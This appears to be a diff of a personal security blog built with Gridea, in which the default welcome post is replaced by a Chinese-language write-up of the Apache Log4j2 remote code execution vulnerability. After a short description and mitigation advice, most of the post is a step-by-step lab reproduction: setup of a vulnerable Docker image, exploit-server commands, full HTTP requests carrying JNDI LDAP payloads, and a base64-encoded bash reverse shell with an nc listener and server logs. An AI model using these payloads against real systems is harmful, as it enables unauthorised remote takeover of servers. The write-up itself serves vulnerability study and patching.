- Gridea -
-- 温故而知新 -
-Verinfinity's blog | security_dog
+ +2021
- - - -- test -
-2018
- - - - - -- Hello Gridea -
--✍️ Gridea 一个静态博客写作客户端。你可以用它来记录你的生活、心情、知识、笔记、创意... ... -]]>
-✍️ Gridea 一个静态博客写作客户端。你可以用它来记录你的生活、心情、知识、笔记、创意... ... - - -
特性👇
-📝 你可以使用最酷的 Markdown 语法,进行快速创作
-🌉 你可以给文章配上精美的封面图和在文章任意位置插入图片
-🏷️ 你可以对文章进行标签分组
-📋 你可以自定义菜单,甚至可以创建外部链接菜单
-💻 你可以在 Windows,MacOS 或 Linux 设备上使用此客户端
-🌎 你可以使用 𝖦𝗂𝗍𝗁𝗎𝖻 𝖯𝖺𝗀𝖾𝗌 或 Coding Pages 向世界展示,未来将支持更多平台
-💬 你可以进行简单的配置,接入 Gitalk 或 DisqusJS 评论系统
-🇬🇧 你可以使用中文简体或英语
-🌁 你可以任意使用应用内默认主题或任意第三方主题,强大的主题自定义能力
-🖥 你可以自定义源文件夹,利用 OneDrive、百度网盘、iCloud、Dropbox 等进行多设备同步
-🌱 当然 Gridea 还很年轻,有很多不足,但请相信,它会不停向前 🏃
-未来,它一定会成为你离不开的伙伴
-尽情发挥你的才华吧!
-😘 Enjoy~
+远程代码执行
+漏洞名称
+apache log4j远程代码执行
+安全等级
+高
+漏洞描述
+Apache Log4j2是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。
+影响范围
+漏洞影响版本:2.0 <= Apache Log4j 2 <= 2.15.0-rc2
+修复建议方案
+紧急:目前漏洞POC已被公开,官方已发布安全版本,建议使用该组件的用户尽快采取安全措施。
+处置:
+1、 升级Apache Log4j 2至最新安全版本,下载地址:
+https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
+缓解措施:
+1、jvm参数 -Dlog4j2.formatMsgNoLookups=true
+2、log4j2.formatMsgNoLookups=True
+要求内容
+执行命令
+测试方法
+手动测试
+测试示例
+示例一:
+环境搭建
+docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
+docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
+docker exec -it log4j_vuln_container /bin/bash
+/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
+
+http://127.0.0.1/webstudy/hello-fengxuan,post参数为c
+起一台服务器,虚拟机复现的话使用虚拟机,使用工具https://github.com/feihong-cs/JNDIExploit 启动ldap服务
+[root@localhost JNDIExploit.v1.2]# java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.52.135
+[+] LDAP Server Start Listening on 1389...
+[+] HTTP Server Start Listening on 8080...
+
+然后使用burpsuite发送请求,payload中的ip为起了ldap服务的主机,base64后面为base64加密的命令,touch /tmp/123
+POST /webstudy/hello-fengxuan HTTP/1.1
+Host: 192.168.52.130:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.52.130:8080/webstudy/hello-fengxuan
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 78
+Origin: http://192.168.52.130:8080
+Connection: close
+Cookie: PHPSESSID=kk43e5f3u4nk4ghhlpjmv7a2h3; security=impossible
+Upgrade-Insecure-Requests: 1
+Pragma: no-cache
+Cache-Control: no-cache
+
+c=${jndi:ldap://192.168.52.135:1389/Basic/Command/base64/dG91Y2ggL3RtcC8xMjM=}
+
+然后发送请求,发现vps显示执行成功.
+root@localhost JNDIExploit.v1.2]# java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.52.135
+[+] LDAP Server Start Listening on 1389...
+[+] HTTP Server Start Listening on 8080...
+[+] Received LDAP Query: Basic/Command/base64/dG91Y2ggL3RtcC8xMjM=
+[+] Paylaod: command
+[+] Command: touch /tmp/123
+[+] Sending LDAP ResourceRef result for Basic/Command/base64/dG91Y2ggL3RtcC8xMjM= with basic remote reference payload
+[+] Send LDAP reference result for Basic/Command/base64/dG91Y2ggL3RtcC8xMjM= redirecting to http://192.168.52.135:8080/ExploitI6LCaJskwj.class
+[+] New HTTP Request From /192.168.52.130:48138 /ExploitI6LCaJskwj.class
+[+] Receive ClassRequest: ExploitI6LCaJskwj.class
+[+] Response Code: 200
+
+去主机上看发现执行成功
+[root@95bf5c2d67f5 tmp]# ls
+123 hsperfdata_root ks-script-LRoSA2 yum.log
+
+反弹shell,使用的工具不一样使用https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 这个工具,更加安全
+在vps上启动一个服务跟上反弹shell命令bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjEzNS84OTkwIDA+JjE=}|{base64,-d}|{bash,-i} -A "xxx.xxx.xxx(vps ip)",其中中间的base64加密是反弹shell命令bash -i >& /dev/tcp/192.168.52.135/8990 0>&1
+[root@localhost JNDIExploit.v1.2]# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjEzNS84OTkwIDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.52.135"
+[ADDRESS] >> 192.168.52.135
+[COMMAND] >> bash -i >& /dev/tcp/192.168.52.135/8990 0>&1
+----------------------------JNDI Links----------------------------
+Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
+rmi://192.168.52.135:1099/3ussmu
+ldap://192.168.52.135:1389/3ussmu
+Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
+rmi://192.168.52.135:1099/uzznko
+ldap://192.168.52.135:1389/uzznko
+Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
+rmi://192.168.52.135:1099/ka0yok
+
+----------------------------Server Log----------------------------
+2021-12-12 05:04:13 [JETTYSERVER]>> Listening on 0.0.0.0:8180
+2021-12-12 05:04:13 [RMISERVER] >> Listening on 0.0.0.0:1099
+2021-12-12 05:04:14 [LDAPSERVER] >> Listening on 0.0.0.0:1389
+
+然后在vps上启动监听
+nc -lvvp xxxx
+然后post请求数据
+POST /webstudy/hello-fengxuan HTTP/1.1
+Host: 192.168.52.130:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.52.130:8080/webstudy/hello-fengxuan
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 43
+Origin: http://192.168.52.130:8080
+Connection: close
+Cookie: PHPSESSID=kk43e5f3u4nk4ghhlpjmv7a2h3; security=impossible
+Upgrade-Insecure-Requests: 1
+Pragma: no-cache
+Cache-Control: no-cache
c=${jndi:ldap://192.168.52.135:1389/uzznko}
]]>+ 友链 +
++ Friends +
++ ITJoker's Blog +
- Gridea -
-- 温故而知新 -
-Verinfinity's blog | security_dog
+ +test
- -Hello Gridea
- - - - + -👏 欢迎使用 Gridea !
-✍️ Gridea 一个静态博客写作客户端。你可以用它来记录你的生活、心情、知识、笔记、创意... ...
<%= post.title %>
+ +- Gridea -
-- 温故而知新 -
-